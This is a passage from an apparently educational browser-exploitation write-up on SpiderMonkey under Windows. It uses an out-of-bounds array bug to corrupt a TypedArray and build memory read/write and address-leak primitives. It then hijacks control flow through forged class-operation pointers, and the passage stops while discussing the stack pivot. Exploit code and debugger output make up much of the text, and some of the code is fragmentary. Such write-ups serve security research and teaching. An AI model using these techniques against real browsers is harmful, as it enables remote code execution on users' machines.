+0x018 parent           : js::GCPtr<js::Shape *>
+0x020 kids             : js::KidsPointer
+0x020 listp            : Ptr64 js::GCPtr<js::Shape *>

VS

0:000> dt js::Shape
+0x000 base_            : js::GCPtr<js::BaseShape *>
+0x008 propid_          : js::PreBarriered<jsid>
+0x010 immutableFlags   : Uint4B
+0x014 attrs            : UChar
+0x015 mutableFlags     : UChar
+0x018 parent           : js::GCPtr<js::Shape *>
+0x020 kids             : js::KidsPointer
+0x020 listp            : Ptr64 js::GCPtr<js::Shape *>


As we want to corrupt the adjacent TypedArray we should probably have a look at its layout. We are interested in corrupting such an object to be able to fully control the memory. Not writing controlled js::Value anymore but actual raw bytes will be pretty useful to us. For those who are not familiar with TypedArray, they are JavaScript objects that allow you to access raw binary data like you would with C arrays. For example, Uint32Array gives you a mechanism for accessing raw uint32_t data, Uint8Array for uint8_t data, etc.

By looking at the source-code, we learn that TypedArrays are js::TypedArrayObject which subclasses js::ArrayBufferViewObject. What we want to know is basically in which slot the buffer size and the buffer pointer are stored (so that we can corrupt them):

class ArrayBufferViewObject : public NativeObject
{
public:
// Underlying (Shared)ArrayBufferObject.
static constexpr size_t BUFFER_SLOT = 0;
// Slot containing length of the view in number of typed elements.
static constexpr size_t LENGTH_SLOT = 1;
// Offset of view within underlying (Shared)ArrayBufferObject.
static constexpr size_t BYTEOFFSET_SLOT = 2;
static constexpr size_t DATA_SLOT = 3;
// [...]
};

class TypedArrayObject : public ArrayBufferViewObject


Great. This is what it looks like in the debugger:

0:000> ?? vp[2]
union JS::Value
+0x000 asBits_          : 0xfffe02163cb019e0
+0x000 asDouble_        : -1.#QNAN
+0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt js::NativeObject 2163cb019e0
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : 0x000002163ccac948 Void
+0x010 slots_           : (null)
+0x018 elements_        : 0x00007ff7f7ecdac0 js::HeapSlot

0:000> dqs 2163cb019e0
000002163cb019e0  000002163cc7ac70
000002163cb019e8  000002163ccac948
000002163cb019f0  0000000000000000
000002163cb019f8  00007ff7f7ecdac0 js!emptyElementsHeader+0x10
000002163cb01a00  fffa000000000000 <- BUFFER_SLOT
000002163cb01a08  fff8800000000008 <- LENGTH_SLOT
000002163cb01a10  fff8800000000000 <- BYTEOFFSET_SLOT
000002163cb01a18  000002163cb01a20 <- DATA_SLOT
000002163cb01a20  0000000000000000 <- Inline data (8 bytes)


As you can see, the length is a js::Value and the pointer to the inline buffer of the array is a raw pointer. What is also convenient is that the elements_ field points into the .rdata section of the JavaScript engine binary (js.exe when using the JavaScript Shell, and xul.dll when using Firefox). We use it to leak the base address of the module.

With this in mind we can start to create exploitation primitives:

1. We can leak the base address of js.exe by reading the elements_ field of the TypedArray,
2. We can create absolute memory access primitives by corrupting the DATA_SLOT and then reading / writing through the TypedArray (can also corrupt the LENGTH_SLOT if needed).

Now, you might be wondering how we are going to be able to read a raw pointer through the Array that stores js::Value? What do you think happen if we read a user-mode pointer as a js::Value?

To answer this question, I think it is a good time to sit down and have a look at IEEE754 and the way doubles are encoded in js::Value to hopefully find out if the above operation is safe or not. The largest js::Value recognized as a double is 0x1fff0 << 47 = 0xfff8000000000000. And everything smaller is considered as a double as well. 0x1fff0 is the JSVAL_TAG_MAX_DOUBLE tag. Naively, you could think that you can encode pointers from 0x0000000000000000 to 0xfff8000000000000 as a js::Value double. The way doubles are encoded according to IEEE754 is that you have 52 bits of fraction, 11 bits of exponent and 1 bit of sign. The standard also defines a bunch of special values such as: NaN or Infinity. Let's walk through each of one them one by one.

NaN is represented through several bit patterns that follows the same rules: they all have an exponent full of bits set to 1 and the fraction can be everything except all 0 bits. Which gives us the following NaN range: [0x7ff0000000000001, 0xffffffffffffffff]. See the below for details:

• 0x7ff0000000000001 is the smallest NaN with sign=0, exp='1'*11, frac='0'*51+'1':
• 0b0111111111110000000000000000000000000000000000000000000000000001
• 0xffffffffffffffff is the biggest NaN with sign=1, exp='1'*11, frac='1'*52:
• 0b1111111111111111111111111111111111111111111111111111111111111111

There are two Infinity values for the positive and the negative ones: 0x7ff0000000000000 and 0xfff0000000000000. See the below for details:

• 0x7ff0000000000000 is +Infinity with sign=0, exp='1'*11, frac='0'*52:
• 0b0111111111110000000000000000000000000000000000000000000000000000
• 0xfff0000000000000 is -Infinity with sign=1, exp='1'*11, frac='0'*52:
• 0b1111111111110000000000000000000000000000000000000000000000000000

There are also two Zero values. A positive and a negative one which values are 0x0000000000000000 and 0x8000000000000000. See the below for details:

• 0x0000000000000000 is +0 with sign=0, exp='0'*11, frac='0'*52:
• 0b0000000000000000000000000000000000000000000000000000000000000000
• 0x8000000000000000 is -0 with sign=1, exp='0'*11, frac='0'*52:
• 0b1000000000000000000000000000000000000000000000000000000000000000

Basically NaN values are the annoying ones because if we leak a raw pointer through a js::Value we are not able to tell if its value is 0x7ff0000000000001, 0xffffffffffffffff or anything in between. The rest of the special values are fine as there is a 1:1 matching between the encoding and their meanings. In a 64-bit process on Windows, the user-mode part of the virtual address space is 128TB: from 0x0000000000000000 to 0x00007fffffffffff. Good news is that there is no intersection between the NaN range and all the possible values of a user-mode pointer; which mean we can safely leak them via a js::Value :).

If you would like to play with the above a bit more, you can use the below functions in the JavaScript Shell:

function b2f(A) {
if(A.length != 8) {
throw 'Needs to be an 8 bytes long array';
}

const Bytes = new Uint8Array(A);
const Doubles = new Float64Array(Bytes.buffer);
return Doubles[0];
}

function f2b(A) {
const Doubles = new Float64Array(1);
Doubles[0] = A;
return Array.from(new Uint8Array(Doubles.buffer));
}


And see things for yourselves:

// +Infinity
js> f2b(b2f([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x7f]))
[0, 0, 0, 0, 0, 0, 240, 127]

// -Infinity
js> f2b(b2f([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0xff]))
[0, 0, 0, 0, 0, 0, 240, 255]

// NaN smallest
js> f2b(b2f([0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x7f]))
[0, 0, 0, 0, 0, 0, 248, 127]

// NaN biggest
js> f2b(b2f([0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff]))
[0, 0, 0, 0, 0, 0, 248, 127]


Anyway, this means we can leak the emptyElementsHeader pointer as well as corrupt the DATA_SLOT buffer pointer with doubles. Because I did not realize how doubles were encoded in js::Value at first (duh), I actually had another Array adjacent to the TypedArray (one Array, one TypedArray and one Array) so that I could read the pointer via the TypedArray :(.

Last thing to mention before coding a bit is that we use the Int64.js library written by saelo in order to represent 64-bit integers (that we cannot represent today with JavaScript native integers) and have utility functions to convert a double to an Int64 or vice-versa. This is not something that we have to use, but makes thing feel more natural. At the time of writing, the BigInt (aka arbitrary precision JavaScript integers) JavaScript standard wasn't enabled by default on Firefox, but this should be pretty mainstream in every major browsers quite soon. It will make all those shenanigans easier and you will not need any custom JavaScript module anymore to exploit your browser, quite the luxury :-).

Below is a summary diagram of the blaze'd Array and the TypedArray that we can corrupt via the first one:

Building an arbitrary memory access primitive

As per the above illustration, the first Array is 0x60 bytes long (including the inline buffer, assuming we instantiate it with at most 6 entries). The inline backing buffer starts at +0x30 (6*8). The backing buffer can hold 6 js::Value (another 0x30 bytes), and the target pointer to leak is at +0x18 (3*8) of the TypedArray. This means, that if we get the 6+3th entry of the Array, we should have in return the js!emptyElementsHeader pointer encoded as a double:

js> b = new Array(1,2,3,4,5,6)
[1, 2, 3, 4, 5, 6]

js> c = new Uint8Array(8)
({0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0})

js> b[9]

js> b.blaze() == undefined
false

js> b[9]
6.951651517974e-310

js> Int64.fromDouble(6.951651517974e-310).toString(16)
"0x00007ff7f7ecdac0"

# break to the debugger

0:006> ln 0x00007ff7f7ecdac0
(00007ff7f7ecdab0)   js!emptyElementsHeader+0x10


For the read and write primitives, as mentioned earlier, we can corrupt the DATA_SLOT pointer of the TypedArray with the address we want to read from / write to encoded as a double. Corrupting the length is even easier as it is stored as a js::Value. The base pointer should be at index 13 (9+4) and the length at index 11 (9+2).

js> b.length
420

js> c.length
8

js> b[11]
8

js> b[11] = 1337
1337

js> c.length
1337

-1.1885958399657559e+148


Reading a byte out of c should now trigger the below exception in the debugger:

js!js::TypedArrayObject::getElement+0x4a:
00007ff7f796648a 8a0408          mov     al,byte ptr [rax+rcx] ds:deadbeefbaadc0de=??

0:000> kc
# Call Site
00 js!js::TypedArrayObject::getElement
01 js!js::NativeGetPropertyNoGC
02 js!Interpret
03 js!js::RunScript
04 js!js::ExecuteKernel
05 js!js::Execute
06 js!JS_ExecuteScript
07 js!Process
08 js!main
09 js!__scrt_common_main_seh

0:000> lsa .
1844:     switch (type()) {
1845:       case Scalar::Int8:
1846:         return Int8Array::getIndexValue(this, index);
1847:       case Scalar::Uint8:
> 1848:         return Uint8Array::getIndexValue(this, index);
1849:       case Scalar::Int16:
1850:         return Int16Array::getIndexValue(this, index);
1851:       case Scalar::Uint16:
1852:         return Uint16Array::getIndexValue(this, index);
1853:       case Scalar::Int32:


Pewpew.

Building an object address leak primitive

Another primitive that has been incredibly useful is something that allows to leak the address of an arbitrary JavaScript object. It is useful for both debugging and corrupting objects in memory. Again, this is fairly easy to implement once you have the below primitives. We could place a third Array (adjacent to the TypedArray), write the object we want to leak the address of in the first entry of the Array and use the TypedArray to read relatively from its inline backing buffer to retrieve the js::Value of the object to leak the address of. From there, we could just strip off some bits and call it a day. Same with the property of an adjacent object (which is used in foxpwn written by saelo). It is basically a matter of being able to read relatively from the inline buffer to a location that eventually leads you to the js::Value encoding your object address.

Another solution that does not require us to create another array is to use the first Array to write out-of-bounds into the backing buffer of our TypedArray. Then, we can simply read out of the TypedArray inline backing buffer byte by byte the js::Value and extract the object address. We should be able to write in the TypedArray buffer using the index 14 (9+5). Don't forget to instantiate your TypedArray with enough storage to account for this or you will end up corrupting memory :-).

js> c = new Uint8Array(8)
({0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0})

js> d = new Array(1337, 1338, 1339)
[1337, 1338, 1339]

js> b[14] = d
[1337, 1338, 1339]

js> c.slice(0, 8)
({0:32, 1:29, 2:32, 3:141, 4:108, 5:1, 6:254, 7:255})

js> Int64.fromJSValue(c.slice(0, 8)).toString(16)
"0x0000016c8d201d20"


And we can verify with the debugger that we indeed leaked the address of d:

0:005> !smdump_jsobject 0x16c8d201d20
16c8d201d20: js!js::ArrayObject:   Length: 3
16c8d201d20: js!js::ArrayObject: Capacity: 6
16c8d201d20: js!js::ArrayObject:  Content: [0x539, 0x53a, 0x53b]
@\$smdump_jsvalue(0xfffe016c8d201d20)

0:005> ? 539
Evaluate expression: 1337 = 0000000000000539


Sweet, we now have all the building blocks we require to write basic.js and pop some calc. At this point, I combined all the primitives we described in a Pwn class that abstracts away the corruption details:

class __Pwn {
constructor() {
this.SavedBase = Smalls[13];
}

}

const IsRead = typeof LengthOrValues == 'number';
let Length = LengthOrValues;
Length = LengthOrValues.length;
}

} else {
dbg('Write(' + Addr.toString(16) + ', ' + Length + ')');
}

//
// Fix U8A's byteLength.
//

Smalls[11] = Length;

//
// Verify that we properly corrupted the length of U8A.
//

if(U8A.byteLength != Length) {
throw "Error: The Uint8Array's length doesn't check out";
}

//
//

return U8A.slice(0, Length);
}

U8A.set(LengthOrValues);
}

}

const Values = new Int64(Value);
}

}

//
// Fix U8A's byteLength and base.
//

Smalls[11] = 8;
Smalls[13] = this.SavedBase;

//
// Smalls is contiguous with U8A. Go and write a jsvalue in its buffer,
// and then read it out via U8A.
//

Smalls[14] = Obj;
return Int64.fromJSValue(U8A.slice(0, 8));
}
};

const Pwn = new __Pwn();


Hijacking control-flow

Now that we have built ourselves all the necessary tools, we need to find a way to hijack control-flow. In Firefox, this is not something that is protected against by any type of CFI implementations so it is just a matter of finding a writeable function pointer and a way to trigger its invocation from JavaScript. We will deal with the rest later :).

Based off what I have read over time, there have been several ways to achieve that depending on the context and your constraints:

1. Overwriting a saved-return address (what people usually choose to do when software is protected with forward-edge CFI),
2. Overwriting a virtual-table entry (plenty of those in a browser context),
3. Overwriting a pointer to a JIT'd JavaScript function (good target in a JavaScript shell as the above does not really exist),
4. Overwriting another type of function pointer (another good target in a JavaScript shell environment).

The last item is the one we will be focusing on today. Finding such target was not really hard as one was already described by Hanming Zhang from 360 Vulcan team.

Every JavaScript object defines various methods and as a result, those must be stored somewhere. Lucky for us, there are a bunch of Spidermonkey structures that describe just that. One of the fields we did not mention earlier in a js:NativeObject is the group_ field. A js::ObjectGroup documents type information of a group of objects. The clasp_ field links to another object that describes the class of the object group.

For example, the class for our b object is an Uint8Array. That is precisely in this object that the name of the class, and the various methods it defines can be found. If we follow the cOps field of the js::Class object we end up on a bunch of function pointers that get invoked by the JavaScript engine at special times: adding a property to an object, removing a property, etc.

Enough talking, let's have a look in the debugger what it actually looks like with a TypedArray object:

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff7f7aee140 56              push    rsi

0:000> ?? vp[2]
union JS::Value
+0x000 asBits_          : 0xfffe016c8d201cc0
+0x000 asDouble_        : -1.#QNAN
+0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt js::NativeObject 0x016c8d201cc0
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : 0x0000016c8daac970 Void
+0x010 slots_           : (null)
+0x018 elements_        : 0x00007ff7f7ecdac0 js::HeapSlot

0:000> dt js!js::GCPtr<js::ObjectGroup *> 0x16c8d201cc0
+0x000 value            : 0x0000016c8da7ad30 js::Ob

+0x000 clasp_           : 0x00007ff7f7edc510 js::Class
+0x008 proto_           : js::GCPtr<js::TaggedProto>
+0x010 realm_           : 0x0000016c8d92a800 JS::Realm
+0x018 flags_           : 1
+0x028 propertySet      : (null)

0:000> dt js!js::Class 0x00007ff7f7edc510
+0x000 name             : 0x00007ff7f7f8e0e8  "Uint8Array"
+0x008 flags            : 0x65200303
+0x010 cOps             : 0x00007ff7f7edc690 js::ClassOps
+0x018 spec             : 0x00007ff7f7edc730 js::ClassSpec
+0x020 ext              : 0x00007ff7f7edc930 js::ClassExtension
+0x028 oOps             : (null)

0:000> dt js!js::ClassOps 0x00007ff7f7edc690
+0x008 delProperty      : (null)
+0x010 enumerate        : (null)
+0x018 newEnumerate     : (null)
+0x020 resolve          : (null)
+0x028 mayResolve       : (null)
+0x030 finalize         : 0x00007ff7f7961000     void  js!js::TypedArrayObject::finalize+0
+0x038 call             : (null)
+0x040 hasInstance      : (null)
+0x048 construct        : (null)
+0x050 trace            : 0x00007ff7f780a330     void  js!js::ArrayBufferViewObject::trace+0

0:000> !address 0x00007ff7f7edc690
Usage:                  Image
End Address:            00007ff7f7fd4000
Region Size:            000000000013a000 (   1.227 MB)
State:                  00001000          MEM_COMMIT
Type:                   01000000          MEM_IMAGE


Naturally those pointers are stored in a read only section which means we cannot overwrite them directly. But it is fine, we can keep stepping backward until finding a writeable pointer. Once we do we can artificially recreate ourselves the chain of structures up to the cOps field but with hijacked pointers. Based on the above, the "earliest" object we can corrupt is the js::ObjectGroup one and more precisely its clasp_ field.

Cool. Before moving forward, we probably need to verify that if we were able to control the cOps function pointers, would we be able to hijack control flow from JavaScript?

Well, let's overwrite the cOps.addProperty field directly from the debugger:

0:000> eq 0x00007ff7f7edc690 deadbeefbaadc0de

0:000> g


And add a property to the object:

js> c.diary_of_a_reverse_engineer = 1337

0:000> g
(3af0.3b40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007ff780e400cc 48ffe0          jmp     rax {deadbeefbaadc0de}

0:000> kc
# Call Site
03 js!DefineNonexistentProperty
04 js!SetNonexistentProperty<1>
05 js!js::NativeSetProperty<1>
06 js!js::SetProperty
07 js!SetPropertyOperation
08 js!Interpret
09 js!js::RunScript
0a js!js::ExecuteKernel
0b js!js::Execute
0c js!ExecuteScript
0d js!JS_ExecuteScript
0e js!RunFile
0f js!Process
10 js!ProcessArgs
11 js!Shell
12 js!main
13 js!invoke_main
14 js!__scrt_common_main_seh


Thanks to the Pwn class we wrote earlier this should be pretty easy to pull off. We can use Pwn.AddrOf to leak an object address (called Target below), follow the chain of pointers and recreating those structures by just copying their content into the backing buffer of a TypedArray for example (called MemoryBackingObject below). Once this is done, simply we overwrite the addProperty field of our target object.

//
// Retrieve a bunch of addresses needed to replace Target's clasp_ field.
//

const Target = new Uint8Array(90);

const MemoryBackingObject = new Uint8Array(0x88);
// 0:000> ?? sizeof(js!js::Class)
// unsigned int64 0x30
print('[+] js::Class / js::ClassOps backing memory is @ ' + MemoryBackingObjectAddress.toString(16));

//
// Copy the original Class object into our backing memory, and hijack
// the cOps field.
//

//
// Copy the original ClassOps object into our backing memory and hijack
//

print("[*] Overwriting Target's clasp_ @ " + TargetClasp_Address.toString(16));
print("[*] Overwriting Target's shape clasp_ @ " + TargetBaseClasp_Address.toString(16));

//
// Let's pull the trigger now.
//

print('[*] Pulling the trigger bebe..');
Target.im_falling_and_i_cant_turn_back = 1;


Note that we also overwrite another field in the shape object as the debug version of the JavaScript shell has an assert that ensures that the object class retrieved from the shape is identical to the one in the object group. If you don't, here is the crash you will encounter:

Assertion failure: shape->getObjectClass() == getClass(), at c:\Users\over\mozilla-central\js\src\vm/NativeObject-inl.h:659


Pivoting the stack

As always with modern exploitation, hijacking control-flow is the beginning of the journey. We want to execute arbitrary native code in the JavaScript. To exploit this traditionally with ROP we have three of the four ingredients:

• We know where things are in memory,
• We have a way to control the execution,
• We have arbitrary space to store the chain and aren't constrained in any way,
• But we do not have a way to pivot the stack to a region of memory we have under our control.

Now if we want to pivot the stack to a location under our control, we need to have some sort of control of the CPU context when we hijack the control-flow. To understand a bit more with which cards we are playing with, we need to investigate how this function pointer is invoked and see if we can control any arguments, etc.

/** Add a property named by id to obj. */
typedef bool (*JSAddPropertyOp)(JSContext* cx, JS::HandleObject obj,
JS::HandleId id, JS::HandleValue v);


And here is the CPU context at the hijack point:

0:000> r
rax=000000000001fff1 rbx=000000469b9ff490 rcx=0000020a7d928800
rip=00007ff658b7b3a2 rsp=000000469b9fefd0 rbp=0000000000000000
r8=000000469b9ff248  r9=0000020a7deb8098 r10=0000000000000000
r11=0000000000000000 r12=0000020a7da02e10 r13=000000469b9ff490
r14=0000000000000001 r15=0000020a7dbbc0b0
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
js!js::NativeSetProperty<js::Qualified>+0x2b52:
00007ff658b7b3a2 ffd7            call    rdi {deadbeefbaadc0de}


Let's break down the CPU context:

1. @rdx is obj which is a pointer to the JSObject (Target in the script above. Also note that @rbx has the same value),
2. @r8 is id` which